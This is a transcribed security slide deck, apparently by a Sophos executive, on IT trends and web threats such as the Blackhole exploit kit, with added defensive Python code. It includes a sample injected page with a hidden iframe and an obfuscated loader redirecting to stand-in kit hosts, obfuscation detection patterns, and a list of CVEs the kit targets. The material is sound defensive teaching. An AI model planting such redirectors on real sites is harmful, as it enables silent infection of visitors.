Big Trends in IT and how they shape Security Gerhard Eschelbeck, CTO
Industry Trends #1: The Rapidly Growing Demand for Processing and Data Storage
Google processes 20 PB a day
London's traffic cams: 8 TB / day
CERN's LHC generates 15 PB a year
Personal photos: 10,000 PB (CAGR 100%)
NOAA has ~1 PB of climate data
Global data has surpassed the Zettabyte barrier (10^21 bytes, or 1 billion Terabytes)
Data-intensive applications: Data Mining and Indexing, Machine Learning, Financial Analysis
"640K ought to be enough for anybody."
Industry Trends Expand your Infrastructure! Buy new servers, increase your software costs, provision more datacenter capacity!!
Industry Trends Look to the cloud! Pay for the bandwidth and server resources that you need. When your job is done then turn the whole thing off!
Industry Trends #2: It's all about the cloud
Industry Trends #3: Virtualization
The ability to run multiple operating systems on a single physical system and share the underlying hardware resources
[Diagram: three VMs, each an App on its own Guest OS (Linux, NetBSD, Windows), running on a Virtual Machine Monitor (VMM) / Hypervisor on top of the Hardware. Examples: Xen, VMware, UML, Denali, etc.]
Industry Trends #4: Mobile and the changing endpoint platforms
"By 2013, the number of mobile workers will grow to nearly 1.2 billion people, representing more than a third of the world's workforce." (IDC, 2010)
Gartner predicts that by 2014 90% of organizations will support corporate applications on consumer devices
The Mobility of Data
What does this all mean to users? Information anywhere Accessible from any device Easy to share Security is at the core of all these changes
Security was easy in the early days
Today: Security is complex
Dropbox: Researchers discovered at least three different ways to hack into Dropbox and access data without authorization
Epsilon: Leaked millions of names and email addresses from the customer databases of some of its clients, including trusted brands like Best Buy, Marks & Spencer, Marriott Rewards and Chase Bank
Sony Corp.'s PlayStation Network / Online Entertainment: Suffered a series of breaches that placed 100 million customer accounts at risk. It's been speculated that this is the most expensive data breach ever, costing the company up to $2 billion
Stratfor: A subscription-based provider of geopolitical analysis, saw its servers breached. The stolen data included 75,000 credit card numbers and 860,000 user names and passwords, which the hackers then exposed online
The Security Landscape
Four goals: Reduce attack surface; Protect everywhere; Stop attacks and breaches; Keep people working
Capabilities listed on the slide: URL Filtering, Web Application Firewall, Endpoint Web Protection, Encryption for cloud, Data Control, Access control, Automation, WiFi security, Anti-spam, Patch Manager, Mobile Control, Virtualization, Anti-malware, User education, Visibility, Local self-help, Device Control, Application Control, Secure branch offices, Mobile app security, Intrusion prevention, Firewall, Clean up, Technical support, Encryption, Tamper protection, Free Home use, VPN, Email encryption, Live Protection, Performance, Small updates
The Changing Threat Landscape
Financially motivated, computer-generated malware
Number of variants is growing sharply
From destructive to stealthy
Vulnerabilities in well-known and broadly used software are common attack vectors
Targeted and organized attacks are becoming widely prevalent
Social networking sites are increasingly used as a distribution mechanism
Short lifetime (hours to days) with fast mutation
More bad files than good files
Web is the primary vector of attack: 19,000 new malicious pages every day, and 80% of them are hosted on legitimate sites
Exploit kits/packs
Web-based kits that make it trivial for anyone to exploit users over the web
Exploit packs can be bought relatively cheaply; no skill required
The kit automatically creates content targeting the browser and application vulnerabilities relevant to each visitor
Silent infection of victims
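The "silent infection" path in practice begins on a compromised legitimate page: the attacker injects a redirector (a hidden iframe, or an obfuscated script that writes one) so that ordinary visitors are sent to the kit's landing page without seeing anything. The scanner below is an added example, not code from this presentation or from Sophos; it applies a few heuristics for such injected redirectors to fetched HTML. The sample pages, the hostnames in them and the thresholds are constructed for illustration, and the assumption that kits are reached through injected hidden iframes or packed loaders is mine, not a statement the slides make.

```python
import re
from dataclasses import dataclass
from html.parser import HTMLParser

# Heuristics for injected redirectors on an otherwise legitimate page (constructed for this example).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I
)
OBFUSCATION_MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
}
# A long run of %XX or \xXX escapes with no whitespace is typical of a packed loader.
ESCAPE_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}){20,}")


@dataclass(frozen=True)
class Finding:
    element: str   # "iframe" or "script"
    target: str    # iframe src, or the first 60 characters of the script body
    reason: str


class InjectScanner(HTMLParser):
    """Collects iframes hidden from the user and scripts that look like packed loaders."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_parts = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            dims = [a.get("width", "").strip(), a.get("height", "").strip()]
            if any(d.isdigit() and int(d) <= 2 for d in dims):
                reasons.append("tiny dimensions")
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden via CSS")
            if reasons:
                self.findings.append(Finding("iframe", a.get("src", ""), "; ".join(reasons)))
        elif tag == "script":
            self._in_script = True
            self._script_parts = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so we can inspect them here.
        if self._in_script:
            self._script_parts.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_parts)
            reasons = [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(body)]
            runs = ESCAPE_RUN.findall(body)
            if runs:
                reasons.append(f"{len(runs)} long escape run(s)")
            if reasons:
                self.findings.append(Finding("script", body.strip()[:60], "; ".join(reasons)))


def scan_html(html: str) -> list:
    """Return the injection findings for one page's HTML, in document order."""
    scanner = InjectScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate-looking page with two injected redirectors.
# The unescape() payload decodes to <iframe src="http://kit.example.invalid/">.
SAMPLE_INJECTED = """<html><head><title>Acme Corp</title></head><body>
<h1>Welcome</h1><p>Legitimate content.</p>
<script>var year = 2012;</script>
<iframe src="http://landing.example.invalid/index.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6B%69%74%2E%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%22%3E'));</script>
</body></html>"""

# Constructed sample: the same page with nothing injected.
SAMPLE_CLEAN = "<html><body><p>Nothing injected.</p><script>var year = 2012;</script></body></html>"

if __name__ == "__main__":
    for f in scan_html(SAMPLE_INJECTED):
        print(f"{f.element:7} {f.reason:35} {f.target}")
```

These heuristics are deliberately cheap so they can run over a crawl of your own sites; a hit is a reason to pull the page and diff it against the deployed source, not proof of compromise on its own, since legitimate trackers also use 1x1 iframes.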
Inside Blackhole Unique rental option within business model. Tight control.
Inside Blackhole: Targets a variety of exploits. Java & Flash most successful.
CVE             Target    Description
CVE-2011-3544   Java      Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability
CVE-2011-2110   Flash     Adobe Flash Player unspecified code execution (APSB11-18)
CVE-2011-0611   Flash     Adobe Flash Player unspecified code execution (APSA11-02)
CVE-2010-3552   Java      Skyline
CVE-2010-1885   Windows   Microsoft Windows Help and Support Center (HCP)
CVE-2010-1423   Java      Java Deployment Toolkit insufficient argument validation
CVE-2010-0886   Java      Unspecified vulnerability
CVE-2010-0842   Java      JRE MixerSequencer invalid array index
CVE-2010-0840   Java      Java trusted Methods Chaining
CVE-2010-0188   PDF       LibTIFF integer overflow
CVE-2009-1671   Java      Deployment Toolkit ActiveX control
CVE-2009-4324   PDF       Use-after-free vulnerability in doc.media.newPlayer
CVE-2009-0927   PDF       Stack overflow via crafted argument to Collab.getIcon
CVE-2008-2992   PDF       Stack overflow via crafted argument to util.printf
CVE-2007-5659   PDF       Collab.collectEmailInfo
CVE-2006-0003   IE        MDAC
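The practical defence against a kit like this is boring: none of the CVEs in the table is a zero-day, so a host is only a viable victim if one of the listed client applications is behind on patches. The checker below is an added example (not code from this presentation or from Sophos) that takes an inventory of installed Java, Flash and Adobe Reader versions and reports which of the table's client-side CVEs the host is still exposed to. The fixed-in versions are my reading of the vendor advisories for those CVEs and should be verified against the advisory before the list is relied on; the inventory keys and the sample hosts are constructed for illustration, and the OS-level entries (CVE-2010-1885, CVE-2009-1671, CVE-2006-0003) are left out because they are patched through Windows Update rather than an application version.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class KitExploit:
    cve: str
    product: str      # inventory key (assumed here): "java", "flash" or "reader"
    fixed_in: tuple   # first patched version on each affected branch, per vendor advisory


def parse_version(text: str) -> tuple:
    """'6u27' -> (6, 27); '10.3.181.23' -> (10, 3, 181, 23); '9.3' -> (9, 3)."""
    return tuple(int(part) for part in text.replace("u", ".").split("."))


# Client-side exploits from the Blackhole table above. Fix versions are taken from the
# vendor advisories (Oracle CPU / Adobe APSB bulletins) and should be verified there.
BLACKHOLE_CLIENT_EXPLOITS = (
    KitExploit("CVE-2011-3544", "java",   ("6u29", "7u1")),
    KitExploit("CVE-2010-3552", "java",   ("6u22",)),
    KitExploit("CVE-2010-1423", "java",   ("6u20",)),
    KitExploit("CVE-2010-0886", "java",   ("6u20",)),
    KitExploit("CVE-2010-0842", "java",   ("6u19",)),
    KitExploit("CVE-2010-0840", "java",   ("6u19",)),
    KitExploit("CVE-2011-2110", "flash",  ("10.3.181.26",)),
    KitExploit("CVE-2011-0611", "flash",  ("10.2.159.1",)),
    KitExploit("CVE-2010-0188", "reader", ("9.3.1", "8.2.1")),
    KitExploit("CVE-2009-4324", "reader", ("9.3", "8.2")),
    KitExploit("CVE-2009-0927", "reader", ("9.1", "8.1.4", "7.1.1")),
    KitExploit("CVE-2008-2992", "reader", ("8.1.3",)),
    KitExploit("CVE-2007-5659", "reader", ("8.1.2",)),
)


def is_exposed(installed: str, fixed_in: tuple) -> bool:
    """True if the installed version predates the fix on its branch.

    Branch = first version component (Java 6 vs 7, Reader 8 vs 9). If no fix is
    recorded for the installed branch, we assume (conservatively) that an older
    branch than any fixed one is unpatched, while a newer branch postdates the bug.
    """
    inst = parse_version(installed)
    fixes = [parse_version(f) for f in fixed_in]
    same_branch = [f for f in fixes if f[0] == inst[0]]
    if same_branch:
        return inst < min(same_branch)
    return inst[0] < min(f[0] for f in fixes)


def exposed_cves(inventory: dict) -> dict:
    """Map product -> sorted CVEs from the kit that its installed version is exposed to.

    inventory maps product key to the installed version string; products that are
    not installed are simply absent and therefore not exploitable by that path.
    """
    out = {}
    for ex in BLACKHOLE_CLIENT_EXPLOITS:
        version = inventory.get(ex.product)
        if version and is_exposed(version, ex.fixed_in):
            out.setdefault(ex.product, []).append(ex.cve)
    return {product: sorted(cves) for product, cves in out.items()}


# Constructed sample hosts: one a few updates behind on everything, one fully patched.
HOST_BEHIND = {"java": "6u27", "flash": "10.3.181.23", "reader": "9.3"}
HOST_PATCHED = {"java": "7u1", "flash": "10.3.181.26", "reader": "9.4"}

if __name__ == "__main__":
    for name, inv in (("behind", HOST_BEHIND), ("patched", HOST_PATCHED)):
        print(name, exposed_cves(inv) or "not exposed to any listed exploit")
```

Note the asymmetry the check makes visible: a host one Java update behind is already a valid target for the kit's most successful exploit, which is why the deck's "Patch Manager" belongs in the "stop attacks and breaches" column rather than being treated as hygiene.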
Inside Blackhole Countries hosting Blackhole exploit kit
Inside Blackhole Administration interface
Inside Blackhole Administration interface optimized for mobile
Blackhole payloads: Zbot, FakeAV, ZeroAccess rootkit, TDSS rootkit, Ransomware. Even OSX payloads?
Police Ransomware
FakeAV: A very clever threat. It scares the user into believing the machine is infected.
FakeAV for Mac No longer are just Windows users the target!
There is even FakeAV for Android!
Android malware
Over 30k variants of malware known
Information stealers (Andr/SMSRep)
SMS senders (Andr/AdSMS)
Phishing (fake mobile banking software)
Privilege escalation exploits (DroidDream)
Zeus for Android (Zitmo)
New Platforms require a new security approach
Challenges: Loss/Theft; Policy, Reporting; Cross Platform; Vulnerable, malicious apps; DLP; Secure browsing
Approach: Application Security, Data Protection, Device Management
Simplifying the entire Security Lifecycle (same four-goal feature grid as the Security Landscape slide: Reduce attack surface / Protect everywhere / Stop attacks and breaches / Keep people working)
Covering the entire Security Lifecycle
1) New computing platforms (Mobile, Cloud, Virtual)
2) The expanded threat (including data loss)
3) More regulations around compliance, data loss and privacy
4) Few IT resources to manage the increasingly complex security landscape
Complete Security Vision
[Diagram: Central office with UTM (or Web, Network, Email, Management, Secure Wi-Fi) protecting Endpoints and Servers; Branch office with RED 10 and Endpoints; Data in the cloud; Mobile / BYOD user; Road warrior over VPN; Visitor; all covered by Active Protection]
Thank You Q&A Gerhard Eschelbeck ge@sophos.com